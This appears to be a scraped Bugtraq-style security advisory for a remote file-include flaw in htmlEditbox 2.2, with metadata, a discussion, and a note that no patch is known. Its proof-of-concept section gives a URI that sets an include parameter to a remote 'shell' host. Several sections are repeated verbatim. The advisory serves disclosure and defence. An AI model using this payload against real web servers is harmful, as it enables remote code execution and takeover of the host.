HTMLEditBox Config.PHP Remote File Include Vulnerability
BID:23664
Info
HTMLEditBox Config.PHP Remote File Include Vulnerability
| Bugtraq ID: | 23664 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 25 2007 12:00AM |
| Updated: | Apr 25 2007 12:00AM |
| Credit: | [email protected] is credited with the discovery of this vulnerability. |
| Vulnerable: |
Labs4 htmlEditor 2.2 |
| Not Vulnerable: | |
Discussion
HTMLEditBox Config.PHP Remote File Include Vulnerability
htmlEditbox is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit this vulnerability to execute malicious PHP code in the context of the webserver. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
htmlEditbox 2.2 is vulnerable to this issue; other versions may also be affected.
htmlEditbox is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit this vulnerability to execute malicious PHP code in the context of the webserver. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
htmlEditbox 2.2 is vulnerable to this issue; other versions may also be affected.
Exploit / POC
HTMLEditBox Config.PHP Remote File Include Vulnerability
Attackers can use a browser to exploit this issue.
A proof-of-concept URI is available:
http://www.example.com/_editor.php?settings[app_dir]=http://shell
Attackers can use a browser to exploit this issue.
A proof-of-concept URI is available:
http://www.example.com/_editor.php?settings[app_dir]=http://shell
Solution / Fix
HTMLEditBox Config.PHP Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
References
HTMLEditBox Config.PHP Remote File Include Vulnerability
References:
References: